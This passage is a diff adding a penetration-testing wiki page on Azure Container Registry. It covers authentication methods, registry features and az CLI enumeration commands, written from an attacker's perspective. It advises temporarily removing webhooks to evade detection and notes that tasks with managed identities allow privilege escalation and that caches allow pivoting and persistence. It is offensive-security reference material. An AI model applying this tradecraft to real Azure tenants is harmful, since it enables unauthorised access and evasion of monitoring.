+- Delete image data
+- Change policies
+- Sign images
+
+There are also some **built-in roles** that can be assigned, and it's also possible to create **custom roles**.
+
+![](</images/registry_roles.png>)
+
+### Authentication
+
+> [!WARNING]
+> It's very imporatant that even if the registry name contains some uppercase letters, you should always use **lowercase letters** to login, push and pull images.
+
+There are 4 ways to authenticate to an ACR:
+
+- **With Entra ID**: This is the **default** way to authenticate to an ACR. It uses the **`az acr login`** command to authenticate to the ACR. This command will **store the credentials** in the **`~/.docker/config.json`** file. Moreover, if you are running this command from an environment without access to a docker socket like in a **cloud shell**, it's possible to use the **`--expose-token`** flag to get the **token** to authenticate to the ACR. Then to authenticate you need to use as user name `00000000-0000-0000-0000-000000000000` like: `docker login myregistry.azurecr.io --username 00000000-0000-0000-0000-000000000000 --password-stdin <<< $TOKEN`
+- **With an admin account**: The admin user is disabled by default but it can be enabled and then it'll be possible to access the registry with the **username** and **password** of the admin account with full permissions to the registry. This is still supported because some Azure services use it. Note that **2 passwords** are created for this user and both are valid. You can enable it with `az acr update -n <acrName> --admin-enabled true`. Note that the username is usually yhe registry name (and not `admin`).
+- **With a token**: It's possible to create a **token** with a **specific `scope map`** (permissions) to access the registry. Then, it's possible to use this token name as username and some of the generated password to authenticate to the registry with `docker login -u <registry-name> -p <password> aregistry-url>`
+- **With a Service Principal**: It's possible to create a **service principal** and assign a role like **`AcrPull`** to pull images. Then, it'll be possible to **login to the registry** using the SP appId as username and a generated secret as password.
+
+Example script from the [docs](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-auth-service-principal) to generate a SP with access over a registry:
+
+```bash
+#!/bin/bash
+ACR_NAME=$containerRegistry
+SERVICE_PRINCIPAL_NAME=$servicePrincipal
+
+# Obtain the full registry ID
+ACR_REGISTRY_ID=$(az acr show --name $ACR_NAME --query "id" --output tsv)
+
+PASSWORD=$(az ad sp create-for-rbac --name $SERVICE_PRINCIPAL_NAME --scopes $ACR_REGISTRY_ID --role acrpull --query "password" --output tsv)
+USER_NAME=$(az ad sp list --display-name $SERVICE_PRINCIPAL_NAME --query "[].appId" --output tsv)
+
+echo "Service principal ID: $USER_NAME"
+echo "Service principal password: $PASSWORD"
+```
+
+### Encryption
+
+Only the **Premium SKU** supports **encryption at rest** for the images and other artifacts.
+
+### Networking
+
+Only the **Premium SKU** supports **private endpoints**. The other ones only support **public access**. A public endpoint has the format `<registry-name>.azurecr.io` and a private endpoint has the format `<registry-name>.privatelink.azurecr.io`. For this reason, the name of the registry must be unique across all Azure.
+
+### Microsoft Defender for Cloud
+
+This allows you to **scan the images** in the registry for **vulnerabilities**. 
+
+### Soft-delete
+
+The **soft-delete** feature allows you to **recover a deleted registry** within the indicated number of days. This feature is **disabled by default**.
+
+### Webhooks
+
+It's possible to **create webhooks** inside registries. In this webhook it's needed to specify the URL where a **request will be sent whenever a push or delete action is performed**. Moreover, Webhooks can indicate a scope to indicate the repositories (images) that will be affected. For example, 'foo:*' means events under repository 'foo'.
+
+From an attackers perspective it's interesting to check this **before performing any action** in the registry, and remove it terporarely if needed, to avoid being detected.
+
+### Connected registries
+
+This basically allows to **mirror the images** from one registry to another one, usually located on-premises.
+
+It has 2 modes: **ReadOnly** and **ReadWrite**. In the first one, the images are only **pulled** from the source registry, and in the second one, images can also be **pushed** to the source registry.
+
+In order for clients to access the registry from Azure, a **token** is generated when the conected registry is used.
+
+### Runs & Tasks
+
+Runs & Tasks allows to execute in Azure container related actions that you typically needed to do locally or in a CI/CD pipeline. For example, you can **build, push, and run images in the registry**.
+
+The easiest way to build and run a container is using a regular Run:
+
+```bash
+# Build
+echo "FROM mcr.microsoft.com/hello-world" > Dockerfile
+az acr build --image sample/hello-world:v1 --registry mycontainerregistry008 --file Dockerfile .
+
+# Run
+az acr run --registry mycontainerregistry008 --cmd '$Registry/sample/hello-world:v1' /dev/null
+```
+
+However, that will trigger runs that aren't super interesting from an attackers perspective cause they don't have any managed identity attached to them.
+
+However, **tasks** can have a **system and user managed identity** attached to them. There tasks are the ones useful to **escalate privileges** in the container. In privileges escalation section it's possible to see how to use tasks to escalate privileges.
+
+### Cache
+
+The cache feature allows to **download images from an external repository** and store the new versions in the registry. It requires to have some **credentials configured** by selecting the credentials from an Azure Vault.
+
+This is very interesting from a attacker's perspective because it allows to **pivot to an external platform** if the attacker has enough permissions to access the credentials, **download images from an external repository** and configuring a cache could also be used as **persistence mechanism**.
+
+## Enumeration
+
+> [!WARNING]
+> It's very important that even if the registry name contains some uppercase letters, you should only use lowercase letters in the url to access it.
+
+```bash
+# List of all the registries
+# Check the network, managed identities, adminUserEnabled, softDeletePolicy, url...
+az acr list
+
+# Get the details of a registry
+az acr show --name <registry-name>
+
+# List tokens of a registry
+az acr token list --registry <registry-name> --resource-group <res-group>
+
+# List repositories in a registry
+az acr repository list --name <registry-name> --resource-group <res-group>
+
+# List the tags of a repository
+az acr repository show-tags --repository <repository-name> --name <registry-name> --resource-group <res-group>
+
+# List deleted repository tags
+## At the time of this writing there isn't yet any command to restore it
+az acr repository list-deleted --name <registry-name>
+
+# List tasks
+## Check the git URL or the command
+az acr task list --registry <registry-name>
+
+# List tasks runs
+az acr task list-runs --registry <registry-name>
+
+# List connected registries
+az acr connected-registry list --registry <registry-name>
+
+# List cache
+az acr cache list --registry <registry-name>
+
+# Get cache details
+az acr cache show --name <cache-name> --registry <registry-name>
+```
+
+## Privilege Escalation & Post Exploitation
+
+{{#ref}}
+../az-privilege-escalation/az-automation-accounts-privesc.md
+{{#endref}}
+
+## References
+
+- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli)
+- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+
+